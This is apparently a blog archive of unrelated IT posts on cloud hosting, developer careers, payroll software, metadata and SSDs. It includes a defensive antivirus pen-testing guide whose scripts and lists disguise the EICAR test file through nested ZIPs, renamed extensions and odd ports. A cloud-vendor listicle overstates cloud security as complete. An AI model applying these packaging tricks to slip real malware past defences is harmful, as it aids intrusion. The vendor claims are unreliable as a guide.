What are the options for business when equipment utilization is low, the cost high, and the equipment is essential to making money? The construction industry offers a potential solution. One company owns the expensive equipment and contractors pay for its use. High utilization reduces the ownership cost per hour.  Contractors no longer have to invest their capital and borrowing capacity in equipment; they can pay for it as they use it.

Creating "rent-like" qualities is one solution that gives enterprises access to their applications and data without the upfront equipment investment. It requires one company to own the expensive IT infrastructure and share it to keep utilization high. To provide unlimited access, however, there has to be enough bandwidth (the electronic means to move data), and the hardware and software must be infinitely expandable. The industrialized world has invested heavily in creating broadband internet as well as new-generation wireless connectivity.

The increase in high-speed connectivity has led to higher demand for access to enterprise applications and data from places once unthinkable. Today, all across America, sales professionals complete transactions in coffee shops and airports. This explosion of access to your enterprise applications and data has put more demands on your equipment and placed your business information at risk. If your business information is so sensitive, what steps are you taking to safeguard it?

In most instances, on-premise security is weak at best. Server access is essentially uncontrolled, and equipment does not have its own power and fire suppression systems. There are limited technical means to keep data from being stored incorrectly on local drives. There are no administrative requirements to create a complex password and change it regularly. Let's be honest: security equals commitment, and commitment equals dollars. Small business just does not have the resources to commit to security. Given their limited resources, decision-makers need to focus on ROI. Marketing and customers generate superior ROI; security systems do not. Face it, though: the demand for access will not go away. This is the dilemma facing decision-makers today.

Securing your sensitive data requires a serious commitment. This commitment is best borne by groups of businesses with identical security needs and a willingness to share the cost of superior security solutions.  To steal a phrase, there is security in numbers and the need for security is what will kill the small server, not the other way around.

About The Author: John Caughell is the Marketing Coordinator for Argentstratus. Argentstratus provides secure hosted solutions for the medical industry. They are experts in the protection of PII and PHI.

Which Programming Language Is Best? (Important Career Advice For Programmers and Developers)

Are you having trouble converting social media leads into paying customers? CoupSmart is an incredibly clever tool that lets you use coupon marketing with the “Insider’s Club” that is your social media contact list.

In addition to being the current CTO of CoupSmart, Troy Davis is an experienced developer with a long list of successes behind him. Through his years in the software industry, he’s noticed some key career trends that separate successful developers from the ones who never reach their potential.

Troy has been nice enough to sit down with me and share some of his insights. Enjoy the interview below.

Can you please give me a bit of background about yourself and CoupSmart?

I started out as a webmaster for ad agencies in 1995, worked as the software developer and default IT manager for a few companies as my career progressed. One product I worked on got some investment money in 2008 and I’ve been working for startup companies as CTO since then. I’ve concentrated mostly on Web applications most of my career, but have also developed a few desktop and embedded apps as well. In 2001 I started a group called the Cincinnati Programmers Guild, an educational non-profit that focused on broadening the knowledge of its members by endorsing no specific technologies, which is much different from most technical groups. Instead, the focus was placed on learning new ideas no matter what technologies were used. We had consistent monthly meetings for 5 or 6 years, and it was a great experience.

CoupSmart was started in 2009 by CEO Blake Shipley. Originally centered around an iPhone app, we shifted focus at the end of last year to try some interesting ideas we came up with regarding the economic, business and social dynamics of coupons. We've been offering a Web/Facebook promotions system for a couple of months now; it allows people to share offers with their friends to earn a higher-value offer. Our customers are mostly in Cincinnati at the moment. We're focused on tying social media to the physical world for our customers, and have recently developed a hardware device for the point of sale to assist in this effort. This is in beta testing with a few customers at the moment.

What is your biggest beef with the mindset of the software development community?

It's not so much the community of software developers that presents a problem; most people who make the effort to seek out and talk with other programmers are seeking knowledge themselves, and usually want to learn how others meet their challenges. This often leads to trying multiple languages, vendors, platforms, etc., and that's all good.

The problem I’m discussing is more often seen in solitary developers. The technologies they use are initially attractive simply because the job ads show higher starting salaries for developers with experience in them. After some classes and much trial and error, the developer becomes minimally competent in a narrow aspect of software development, and lands a job by interviewing (often) with a non-technical HR person that can’t screen developers well.

After a few years, the developer achieves a certain level of proficiency with the tasks often assigned to them, and is assumed to be a software development professional. And they often coast at this level for however long they can.

Some time later, a new person takes over the department and doesn’t care for the technologies used by their predecessor. So a migration effort begins, and everyone is expected to adapt to the new technologies quickly or find some other kind of work for themselves. If a developer had taken an interest in keeping up to date with their field of work, they’d have recommendations for the new systems to contribute, and would likely find a comfortable place in the new structure. But those who rested on their laurels often respond defensively, obstructing change because they simply fear it. And ultimately they get pink slips.

When I was active with the Cincinnati Programmers Guild, I saw many mainframe developers who had been laid off in waves, and once unemployed were desperate to pick up that one key idea they needed to get another job doing the same thing they were doing for the last 15 or 20 years. Many of these people came to their first Guild meetings having only written COBOL or Fortran their entire careers. They’d never bothered to learn anything else. And most of them seemed to have the idea that learning just one new language was all that they needed to regain their previous role and stature.

Some got certifications in .Net or Java, spending thousands of dollars to reboot their careers. A few got new jobs and I never saw them at Guild meetings again; they reverted to their solitary existences, I suppose. But most of them lingered in unemployment for years, taking this class or that class as they could afford it with temp jobs. Very few of them tried to go freelance, either. They all wanted back into large companies, it seemed. The illusion of job security was prevalent, despite the obvious evidence to the contrary: namely, all of the people with similar career conundrums attending the meetings.

If a developer has had success under a certain platform or language, what’s wrong with specializing and becoming an expert in that particular area?

There’s nothing wrong with becoming an expert in a particular area of study, it’s overspecialization that’s the problem: Focusing on one set of technologies to the exclusion of all others. So just because you happen to like writing C++ on Linux doesn’t mean you should pretend like it’s the only way to write decent software. You might fool a few people into believing you, but ultimately you’re just fooling yourself.

An example: A programmer I used to work with just absolutely hated Windows and everything that went with it. Just couldn't stand to be in the same room with it. I worked on a Mac, so I was exempt somehow. But we had a web application that needed to be compatible with all the major browsers, and that was the plan. This developer fought with just about everyone on the staff to simply not support Internet Explorer, which would have been an almost certain act of suicide for any SaaS company. I was in charge of this group, so it was my job to try to persuade her to just get the compatibility work done despite her qualms. It didn't work out very well; several fits of yelling and rage happened, both in person and over the phone. I urged her to work as a freelancer only for a while to see if some isolation would help, but it didn't, and ultimately she was laid off.

Another example: A Linux developer worked with me at the first ad agency I worked at in the late 90s. He was young and very opinionated about how great his chosen technologies were. He frequently insulted coworkers for what he saw as their technical incompetence; he was not popular with the staff. But he wrote code nobody else at the company knew how to write at the time, and it was important code, so his social eruptions were tolerated. I decided to learn more about Linux and C at that point, and within a couple of months had a pretty good understanding of what this guy was doing every day. And it wasn't much. His claims of technical superiority had become a crutch, and he used others' lack of knowledge to justify not working very hard at all. Ultimately he was let go after a particularly nasty exchange with a few coworkers. The next day he logged into a client's server from his home and deleted their entire website, along with several log files that might have implicated him in doing so. But he missed one, and it had an IP address, which we confirmed later that day with his ISP to be assigned to his login at that time. We lost the client anyway, but he got special oversight from law enforcement authorities for years afterward. Might still be monitored, I'm not sure.

Many would argue that it’s a smart bet and a smart career move to align your efforts with the strongest or most dominant platform. What’s wrong with this mindset?

Nothing, so long as you understand that what you’re focusing on is just the current flavor of the month, and will inevitably be replaced with some other technology at some point. So just be prepared by learning about the alternatives before it’s time to switch.

My point is that programming is a career path where any valued proficiency has an expiration date attached, and as time goes on, that expiration period grows shorter. This is commensurate with how fast hardware is changing; the microprocessor industry has stayed pretty close to the predictions of Moore's Law for over 30 years now, and many academics say that this is evidence that we are still in the infancy of computing. It would be unwise to assume that we've reached any kind of sustainable plateau with these technologies yet.

So the mainframe folks I mentioned earlier that had the same tasks for 15 or 20 years are likely to be the last of their kind. A lone, overspecialized programmer entering the field today may only get away with her current skill set for 5-10 years. This continual decrease in the longevity of newly learned computing skills agrees with the technological singularity concept, something that might be worth checking out:

http://en.wikipedia.org/wiki/Technological_singularity

What’s the worst that can happen? What’s wrong with sticking to techniques that are “good enough”, and more familiar?

I see possible dangers including a widespread deficit of capable programmers because of overspecialization in now-antiquated technologies (large companies have been using this claim to justify increasing numbers of tech worker visas for decades), and massive amounts of money spent unnecessarily to prop up an aging technology due to internal resistance to change. These ultimately make the entire economy less productive / profitable. That means fewer jobs for everyone and a smaller economy overall as valuable resources are spent in non-productive efforts, trying to catch tempests in cups of various sizes and compositions instead of inventing what’s actually needed for the foreseeable future.

And there’s a long-running developer philosophy that “good enough” techniques really are good enough, as long as you know your options well. That’s not at odds with the value of continual learning, however. Most of the time, “good enough” has to do with a judgement of how much time it would take to implement a more complex solution to a problem, versus choosing a simpler method which has known drawbacks, but will probably not manifest as a problem. Using an old technique to deliver desired functionality faster isn’t inherently wrong, it might be the best way to get the system working as desired. But being unaware of the alternatives for that decision can be costly for many more people than the developer and their employer. Software inadequacies get repeated over and over with growing numbers of people, so a bad decision of one developer can have a disproportionately large impact on the lives of many more people over time.

But more to the point, I don’t think it’s possible to back up a claim that any single software technology will be “good enough” to address a wide variety of problems over a long time span. We’re just not at that stage of technological development yet.

What was your development philosophy when working on CoupSmart, and what kind of results did it bring?

The software development work had already been started by two part-time developers when I joined CoupSmart, so the language had already been chosen, and it was PHP. It’s not my favorite language, but it’s perfectly suitable for modern web apps, so I wasn’t concerned. There’s also an advantage in that more developers fresh out of college have a working knowledge of PHP, whereas fewer are familiar with Ruby, which is the language I might have chosen if the variables had been different.

And although it's probably too early to tell if our programming language choice had a direct impact on the success of CoupSmart as a company, we are often praised by other entrepreneurs in our circle of friends whose software development teams are working in .Net or Java and are apparently far less productive given the same resources. So I'll count that as a tentative win.

Why do you think other developers are so resistant to new ideas?

I think you can answer this with the same reasons people resist change in general. Fear of the unknown, self-doubt, overwhelming choices, etc. It’s really no different. We develop habits because it’s easier than rethinking every single past decision, it’s just faster. But when you fail to reevaluate your prior decisions for too long, there are always consequences as you and the rest of society drift apart ideologically.

One woman I met through the Guild was a COBOL mainframe programmer who got laid off after more than 20 years of writing the same kind of code every work day. They replaced the mainframe with a more modern system, and she had not transferred to the team doing the new work. She thought their project would fail, apparently. It certainly could have; lots of software projects fail. But this one didn't, and she was laid off shortly after the mainframe was decommissioned. She decided that the key thing in modern programming that had been absent from her work was object orientation (aka OO), a layer of abstraction that makes it easier to design large software systems. I encouraged her to learn a new language in order to become familiar with OO concepts, but she seemed afraid somehow. Months later, she told me that she had finally registered for a class in .Net. That would certainly cover OO topics, so I tried to give some positive reinforcement. But I think her conception of how novel this concept was may have gotten in the way of her simply using it until she understood it. She remains out of work to this day, over 5 years later.

I'm acquainted with a developer who worked for a competing ad agency. I talked with him over lunch one time, and he admitted rather shyly that he was still doing most of his work in ColdFusion, a programming environment that is arguably not aging very well. I asked him if he was thinking about trying anything more modern for new projects, and he claimed to have investigated a few other options, but just wasn't willing to give up his favorite environment, which he loved and felt very comfortable with. About two years later, I heard that his company had shut down his department and laid him off; not enough clients wanted their work done in ColdFusion any more, and the developer just wasn't willing to try something else, so they stopped getting new projects, and after a while they couldn't justify keeping him full-time just for maintenance work on old apps.

Top 21 SaaS Payroll and Online Payroll Software Reviews

  1. PayCom – One of the fastest-growing payroll software companies. They can easily simplify complex payroll processes.
  2. IOI Pay – A national leader in outsourced HR, Payroll and Tax filing. With a handy web-based interface for both employers and employees.
  3. Einstein HR – Highly customizable online HR software, built with HR professionals in mind.
  4. Workday – Advanced payroll software, proudly delivered in the cloud.
  5. Paymate – An online payroll software provider that caters to the unique requirements of Canadians.
  6. Payroll Data – The next level in web-based payroll and HR management software.
  7. Greytip – Payroll software company with an online version. Specializes in companies with up to 30,000 employees.
  8. PayCycle – World-famous payroll software, trusted by over a million companies.
  9. Advantag SBS – Streamlined online payroll with great pricing, great service and great options.
  10. Surepayroll – Award-winning payroll software that's well-recognized within the industry.
  11. Amcheck – Secure online payroll processing that caters to medium and large companies.
  12. Paylocity – A company that’s turning the world of SaaS payroll and HR on its head.
  13. Triton HR – Web-based payroll software that's good enough for Fortune 1000 companies.
  14. Simple Payroll – Gives you the power to manage and verify payroll 24 hours a day.
  15. Paycor – An online payroll company that really takes care of their clients.
  16. Patriot Software – Inexpensive payroll software that’s both accurate and fast.
  17. Perfect Software – SAS70 certified SaaS payroll software from an all-in-one online HRIS vendor.
  18. Compupay – Flexible payroll software that’s accessible online, by phone or even by fax.
  19. Epayroll – An Australian vendor of online payroll software as a service.
  20. Evetan – A fast, easy and simple online payroll system. With helpful instructional videos.
  21. WebPayroll – Painless, flexible and secure payroll software. Based out of Australia.

Top 10 Myths and Lies used by installed software vendors to scare you away from the cloud

A lot of the myths below are being debunked as more and more cloud applications demonstrate that there is clearly a better way of doing things. But you still hear the following claims in enterprise sales pitches. The top 10 myths surrounding cloud applications are listed below, and in each case exactly the opposite is true!

1. Your data is not secure because it’s not on your own server/ laptop

Your data can be just as secure on a provider's server as on your own. You do trust your bank with your data, right? Your bank and many other such services store your data on servers all over the world. Also, many would argue that your data backed up on secured servers is a lot safer than on your laptop alone. What if you lose your computer?

2. Cloud is not reliable – what if the site is down?

There are two aspects here – the internet connection and the cloud company's site. Both statistically have uptime rates approaching 99.99%. In fact, you are more likely to have your installed software crash, hit a bug, or depend on processes that your IT admin has to keep running. Cloud companies are hosted on reliable services like Amazon EC2 and many others, which are leaders in online continuity.

3. It’s not scalable – you can’t use the cloud for large operations

Cloud applications are massively scalable. Salesforce.com and Recruiterbox.com place no practical limits on their respective usage. You can run a global operation off these systems.

4. The primary reason to use cloud is that it is cheap

Cloud is value for money. It’s not a compromise you make because installed software is more expensive. Cloud is scalable, flexible and can be accessed from anywhere, and one can share the same updated data with others. It runs on the latest technology that keeps getting updated automatically and it is completely secure. It’s a better way to run things.

5. Cloud applications are not as powerful as desktop applications

Cloud applications are extremely powerful in terms of functionality. In fact, they are designed with the needs of the entire user base in mind and constantly updated based on feedback from hundreds of companies, not just yours. The result is functionality that your already-installed software cannot replicate. It allows you to get more done, more efficiently.

6. Cloud applications are new and untested

Cloud applications are continuously tested even before going live, and are constantly improved. Many companies rely heavily on online applications; in fact, for most small companies the cloud is not a new solution, it's the only solution.

7. Your data offline is accessible and flexible enough

If you compare both accessibility and flexibility between an offline and an online system, you will answer this question yourself. You can access an online application anywhere, from any computer. Whatever changes or updates you make are live and complete immediately. This has a much greater impact on the way businesses are run today, and it's almost a necessity in this mobile age, when people are working from different places.

8. Cloud companies don’t know enough about your usage

Cloud companies know more about how your company works than any enterprise software company. An enterprise vendor is selling you what they have built, and they might customize it to your current processes; a cloud company, on the other hand, has built its solution from the ground up based on the input of many companies with usage similar to yours. So they have the benefit of a wider vision for developing, scaling and constantly improving the solution in just the way you need to use it.

9. Your enterprise installed software is the latest and greatest

An enterprise software company made certain technology choices at inception, and once you get used to their system, they provide you with newer versions at regular intervals. But along the way, you will not see a boost in functionality when a better way to do things emerges. A cloud company can continuously improve your user experience because it's online, and they can constantly make your life easier by finding the best way to get something done.

10. It will be simple for established software vendors to give you a SaaS/cloud version of their installed software

The way an installed solution is developed is very different from a cloud one. A cloud application is built from the ground up for the very purpose of doing things online. It is lean in terms of size, to ensure the user can achieve their objective in the fastest and most efficient way. In contrast, an enterprise company cannot simply take an existing desktop application, which was not built with these considerations, and convert it into an online application.

About The Author: Raj Sheth is the Co-Founder of Recruiterbox.com. Recruiterbox is a cloud-based job application management service that’s used by fast-growing companies like Groupon.

How to Test Your Antivirus, Anti-Malware, Firewall and Network Perimeter Security Devices (Penetration testing and pen tests)

As with any critical security function in IT, you need to test your company’s antivirus and anti-malware protection. It’s not enough to trust your vendor. Even if their products are working perfectly, the implementation might’ve left some holes open in your security.

That’s why you should test the security of your internal network several times per year in order to predict how well it can defend against viruses, malware and other nasty attacks.

The best way to test your network is through penetration testing. (Often called pen testing)

For this article, we’ll only be focusing on the virus/malware area of pen testing. There are other tests that must also be performed as part of a full audit, but we’ll save that for another article.

At first, it may appear that the simplest way to test your security would be to gather up thousands of nasty viruses and set them loose on your network. Then, you could go back and measure the percentage that were blocked in order to determine the effectiveness of your network protection.

However, the results of such a test can be misleading since it might fail to expose critical flaws in your security.

Before attempting that kind of test, you must first check that your network security is actually working at a basic level. A better approach is to start with just one simple test virus and alter it in various ways to detect specific vulnerabilities.

You can get a benign test virus here. This file shouldn’t hurt your system, but it SHOULD trigger your antivirus.
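The linked file is presumably the standard EICAR test string, a harmless 68-character string that mainstream antivirus vendors agree to detect. If you'd rather generate it yourself, here is a minimal sketch:

```python
# Minimal sketch: write the standard EICAR antivirus test string to disk.
# The string is split in two so this script itself is less likely to be
# quarantined before you run it; the file it writes SHOULD trip your scanner.
EICAR_PART_1 = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$"
EICAR_PART_2 = "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

with open("eicar_test.com", "w", newline="") as f:
    f.write(EICAR_PART_1 + EICAR_PART_2)

print("Wrote eicar_test.com - expect your antivirus to react to it.")
```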

Now that you have a virus for testing, you’ll also want to set up an external Linux web server, FTP server and email server to deliver the file. In order to truly test the capabilities of your security, you’ll also want to switch up the ports.

For example, you may want to set up web servers on ports 80 and 242. And you may want to set up one POP server on port 110 and another on port 23 – which is normally used for Telnet.
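If you don't have spare infrastructure, even a throwaway server will do for the web-download part of the test. A minimal sketch using Python's built-in HTTP server follows; the port number is an arbitrary choice of mine, and ports below 1024 (such as 242) generally require root privileges.

```python
# Minimal sketch: serve the current directory over HTTP on a nonstandard port,
# so you can test whether downloads are scanned on ports other than 80/443.
# Ports below 1024 (such as 242) usually require root/admin privileges.
from http.server import HTTPServer, SimpleHTTPRequestHandler

PORT = 8242  # arbitrary nonstandard port chosen for illustration

if __name__ == "__main__":
    server = HTTPServer(("0.0.0.0", PORT), SimpleHTTPRequestHandler)
    print(f"Serving test files on port {PORT} - Ctrl+C to stop")
    server.serve_forever()
```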

Then, try to push the file into your network using different means, hiding the file in different ways (a few of these packaging variations are sketched in code after the list below).

  • Try sending it as a simple email attachment.
  • Try compressing the virus into a ZIP file
  • Try making a ZIP file that contains another ZIP file holding the virus
  • Try single- and double-zipping the virus, and password-protecting the archive
  • Try unconventional compression formats like RAR or GZIP
  • Try changing the name of the file
  • Try changing the file extension so that it appears to be another type of document (.PDF, .JPG, .PPT)
  • Try embedding it in a document such as Word or Excel.
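A few of those packaging variations can be generated in a couple of lines. A minimal sketch follows; note that Python's standard zipfile module cannot create password-protected archives, so that particular variant needs an external tool such as the zip command's -P option.

```python
# Minimal sketch: package the test file a few different ways (plain ZIP,
# nested ZIP, misleading extension) to probe how deeply attachments and
# downloads are inspected. Assumes eicar_test.com was created earlier.
import shutil
import zipfile

SOURCE = "eicar_test.com"

# 1. Single ZIP
with zipfile.ZipFile("test_single.zip", "w") as z:
    z.write(SOURCE)

# 2. Double (nested) ZIP - a ZIP containing the first ZIP
with zipfile.ZipFile("test_double.zip", "w") as z:
    z.write("test_single.zip")

# 3. Renamed copy with a misleading extension
shutil.copyfile(SOURCE, "quarterly_report.pdf")

# 4. Renamed ZIP posing as an image
shutil.copyfile("test_single.zip", "holiday_photo.jpg")

print("Created test_single.zip, test_double.zip, quarterly_report.pdf, holiday_photo.jpg")
```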

If you use your imagination, you could probably come up with a hundred variations. Once you’ve done this, you’re ready to start testing.

  • Try emailing the file into your network, and also try sending it out from within your network. Additionally, you'll want to try sending it internally from one machine to another (a sketch of the email variant follows this list).
  • Post all of these files up on your web servers and FTP servers, and try downloading all of the files.
  • Set up an online message board on your web server and see if the virus files can be uploaded to the forum as attachments. Also, try doing the same on your private intranet, if you have one in place.
  • Try downloading the files from other sources, such as Gmail or any other hosted applications that could potentially be used to distribute viruses.
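For the email leg of the test, something like the following sketch will do. The mail server hostname, port, and addresses are placeholders; point it at a test mailbox inside your own lab, never at anyone else's systems.

```python
# Minimal sketch: email one of the packaged test files to a test mailbox,
# to check whether the mail gateway strips or flags it. The hostname and
# addresses below are placeholders for your own lab environment.
import smtplib
from email.message import EmailMessage

msg = EmailMessage()
msg["Subject"] = "AV gateway test - nested ZIP"
msg["From"] = "pentest@yourlab.example"
msg["To"] = "target-mailbox@yourlab.example"
msg.set_content("Benign EICAR test attachment - see the security test plan.")

with open("test_double.zip", "rb") as f:
    msg.add_attachment(f.read(),
                       maintype="application",
                       subtype="zip",
                       filename="test_double.zip")

with smtplib.SMTP("mail.yourlab.example", 25) as smtp:
    smtp.send_message(msg)
```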

As you expand your options, you'll build up a wide matrix of potential vulnerabilities. Keep a spreadsheet of your results in order to spot patterns.
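
The download half of that matrix can also be scripted so the spreadsheet stays current. The sketch below is only an illustration under assumed names (Python, a placeholder test-server hostname, and the variant file names from the earlier sketch); it simply records whether each file made it through the gateway in transit (your antivirus may still catch it on the endpoint afterwards):

    # pull_variants.py - minimal sketch: try to download each variant through the
    # security gateway and log the outcome to a CSV for the results matrix.
    # Hostnames, ports and file names are placeholder assumptions.
    import csv
    import urllib.request

    HOSTS = [
        "http://test-server.example.com:80",
        "http://test-server.example.com:242",
    ]
    FILES = ["quarterly_report.dat", "invoice.pdf", "single.zip", "double.zip", "test.gz"]

    with open("pen_test_results.csv", "w", newline="") as out:
        writer = csv.writer(out)
        writer.writerow(["url", "result"])
        for host in HOSTS:
            for name in FILES:
                url = f"{host}/{name}"
                try:
                    with urllib.request.urlopen(url, timeout=10) as resp:
                        resp.read()
                    result = "downloaded (not blocked in transit)"
                except Exception as exc:  # blocked, reset, timed out, etc.
                    result = f"blocked/failed: {exc}"
                writer.writerow([url, result])
                print(url, "->", result)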

Once you've secured your network against a single virus that has been exhaustively tested in every possible way, you'll have much more to gain from more advanced testing.

Remember Kids: Always test offline, and never compromise a live, critical system.

What is Metadata, and how does it apply to business computing? (Types of Meta Data)

The word “Meta” gets thrown around a lot these days. But before I start talking about what meta content is, I'd like to take a moment to discuss what it isn't.

Specifically, when the term “meta humour” is thrown around, it's actually a form of “recursive humour”. There is nothing “meta” about it. I'm sorry to be such a stickler, but it just grinds my gears when people use that term in the wrong context.

“Meta Data” is actually a fairly simple concept to understand. The term simply describes data that gives you more insight into the context of other data.

Dewey Decimal System

One of the oldest and best-known examples of meta data is the Dewey Decimal System used by public libraries. (Remember those?) The data stored within a library book could be thought of as the primary data. However, the index card relating to that book will contain all sorts of useful meta data:

  • The due date
  • The category
  • Physical location within the library
  • Rental History
  • Author
  • Publication date
  • ISBN number
  • And more

Meta Data In Enterprise Computing

In a similar way, many enterprise search, document management, and archiving applications will store a secondary database along with your flat files in order to improve security, optimize server performance, and provide insight into data usage.

A database index (or cache) of the text contained within a series of documents can be searched much more quickly and easily than scanning through each file individually. This can greatly improve search speeds.
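
As a toy illustration of the idea (a sketch only; real products use far more sophisticated engines), here is a minimal inverted index in Python. The word-to-document map is built once up front, so each search becomes a dictionary lookup instead of a scan of every file; the folder name is just a placeholder:

    # minimal sketch of an inverted index: map each word to the set of documents
    # that contain it, so a search is a lookup rather than a full scan.
    from collections import defaultdict
    from pathlib import Path

    def build_index(folder: str) -> dict:
        index = defaultdict(set)
        for path in Path(folder).glob("*.txt"):   # placeholder: plain-text files
            for word in path.read_text(errors="ignore").lower().split():
                index[word].add(path.name)
        return index

    def search(index: dict, word: str) -> set:
        return index.get(word.lower(), set())

    # usage (folder name is a placeholder assumption):
    # idx = build_index("documents")
    # print(search(idx, "invoice"))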

Also, companies and organizations can track audit trails to prevent privacy breaches and keep tabs on who’s been accessing which files.

Online Meta Data

Another common example of meta data is right here on the Internet. Within each page, there are hidden supporting files (like CSS files that tell your browser how the page is meant to be displayed) and header tags (like Meta tags that tell search engines how to classify and rank your site).

Your own computer also contains a lot of meta data which can be used by web sites. Online advertising companies place cookies in your browser so that they can follow your browsing habits and serve highly targeted ads. Also, the combination of browser, OS, screen resolution, IP address and plug-in versions can act as a “fingerprint” which can be used to uniquely identify your machine. This is one of the ways online advertising companies prevent click fraud.

Even domain names contain meta data about the web site owner and hosting company. This can be obtained through a WHOIS service.
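
The WHOIS protocol itself is simple: open a TCP connection to port 43 of a registry's WHOIS server, send the domain name, and read the reply. A minimal sketch in Python is below; the server name is an assumption that applies to .com domains, and most systems also ship a ready-made whois command:

    # minimal sketch of a raw WHOIS lookup over TCP port 43.
    # whois.verisign-grs.com is assumed to handle .com registrations.
    import socket

    def whois(domain: str, server: str = "whois.verisign-grs.com") -> str:
        with socket.create_connection((server, 43), timeout=10) as sock:
            sock.sendall((domain + "\r\n").encode())
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks).decode(errors="ignore")

    # usage:
    # print(whois("berkshirehathaway.com"))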

Meta Data In Plain Files

Another common example of meta data can be found within the documents you produce and receive. Music and movie files contain hidden meta data about the artist, genre, track names, etc… And picture files contain lots of useful information such as the author, GPS coordinates, date, etc…

Google Maps uses GPS information contained within pictures to help plot the locations where they were taken. This allows online users to browse pictures by location and go on a virtual sightseeing trip.
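
If you want to see that GPS metadata for yourself, it lives in the photo's EXIF tags. Here is a hedged sketch that assumes the third-party Pillow imaging library is installed (pip install Pillow) and reasonably current; the file name is a placeholder:

    # minimal sketch: read the GPS-related EXIF tags from a photo.
    # Requires the Pillow library; 0x8825 is the standard GPSInfo IFD pointer tag.
    from PIL import Image, ExifTags

    def gps_tags(path: str) -> dict:
        exif = Image.open(path).getexif()
        gps_ifd = exif.get_ifd(0x8825)
        # translate numeric tag IDs into readable names where possible
        return {ExifTags.GPSTAGS.get(tag, tag): value for tag, value in gps_ifd.items()}

    # usage (file name is a placeholder):
    # print(gps_tags("holiday_photo.jpg"))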

Of course, there are also serious privacy and litigation concerns that must be kept in mind.

I was once emailed a supposedly anonymous Word document, where the author's name was written within the document's meta data. If this had happened within a highly regulated industry such as healthcare, the military or finance, the consequences could've been very serious.

The “Creation Date” and “Last Modified Date” meta data obtained from files can also be useful in the courtroom in order to prove or disprove a timeline of events. It can even help your company win a case by demonstrating that a statute of limitations had expired.
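
Those dates are easy to inspect, because the filesystem exposes them through an ordinary stat call. Here is a small sketch (Python; the file name is a placeholder). One caveat: not every filesystem records a true creation date, so the modification time is usually the more reliable field:

    # minimal sketch: read the timestamp metadata the filesystem keeps for a file.
    # On Linux, st_ctime is the inode-change time rather than a true creation
    # date; macOS and Windows expose a separate birth/creation time.
    import os
    from datetime import datetime

    def file_times(path: str) -> dict:
        st = os.stat(path)
        return {
            "modified": datetime.fromtimestamp(st.st_mtime),
            "accessed": datetime.fromtimestamp(st.st_atime),
            "changed_or_created": datetime.fromtimestamp(st.st_ctime),
        }

    # usage (file name is a placeholder):
    # print(file_times("contract.docx"))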

Meta data might be out-of-sight, but it should always be top-of-mind. It's an invisible force that can have a significant impact on the way you do business.

The Difference Between MLC (Multi Level Cell) and SLC (Single Level Cell) SSDs (Solid State Drives)

MDL Technology, LLC is a Kansas City IT company that specializes in worry-free computer support by providing solutions for around-the-clock network monitoring, hosting, data recovery, off site backup security and much more. MDL Technology, LLC is dedicated to helping businesses place time back on their side with quick and easy IT solutions.

Today, I’ll be interviewing TJ Bloom, who is the Chief Operations Officer at MDL Technology. And he’ll be giving us a brief overview of SSD technology.

What is the difference between MLC (Multi Level Cell) and SLC (Single Level Cell) solid state drives?

Multi-Level Cell is a memory technology that stores multiple bits of information per cell by using several charge levels. Because of this, MLC drives have a higher storage density and a lower per-MB manufacturing cost, but there is a higher chance of error on the drive. This type of drive is typically used in consumer products. Single-Level Cell stores only one bit of information per cell. This decreases power consumption and allows for faster transfer speeds. This technology is typically reserved for higher-end or enterprise drives, where speed and reliability are more important than cost.

How does the endurance of SSD drives compare to traditional hard drives? What factors contribute to SSD durability?

SSD drives are much faster than a traditional HDD. SSDs use NAND flash memory, which means they have no moving parts. The absence of moving parts allows for faster data retrieval times and better stability and durability. Furthermore, SSDs can withstand a much higher level of shock than an HDD before sustaining damage, again because there are no moving parts.

What types of solid state drives are best-suited to laptops or typical PC use?

What you are willing to spend on performance and reliability determines the best drive for your PC. If you replace or purchase a laptop or PC with an MLC SSD, you should see significant performance and reliability increases over a standard HDD. MLC SSDs are typically used in PCs and other non-critical environments. In enterprise and critical environments, it is advisable to use SLC SSDs, which will increase performance over an HDD and add speed and durability. An SSD is also much quieter than an HDD.

What types of solid state drives are best-suited to servers?

The Intel® X25-E Extreme SATA Solid-State Drive is one option for running your server on SSDs. It will be much quieter, more stable and faster than a traditional HDD.

What advice can you give for someone looking to get the following benefits from their SSD purchase:

  • Overall Cost – At the server level, SSDs are still very expensive compared to HDDs.
  • Cost-per-gigabyte – Cost per GB for SSDs can be as low as $1.87, but HDDs, coming in at under $0.13 per GB, still make SSDs hard to justify.
  • Speed – If you are looking for speed, SSD is the way to go.
  • Reliability – With no moving parts, SSDs offer better reliability.
  • Longevity – The same lack of moving parts also translates into better longevity.

What are some good general tips for picking the best solid-state drives, or deciding between SSD and traditional hard drives?

I like to read reviews of whatever I am purchasing; http://www.ssdreview.com/ is a good place to start.

This will help you ask the right questions and choose the best options for your application.

How do you see the future for SSD technology?

I think in the future you will start seeing more and more SSD drives built onto the motherboard of the computer. At some point we will be using just one big chip.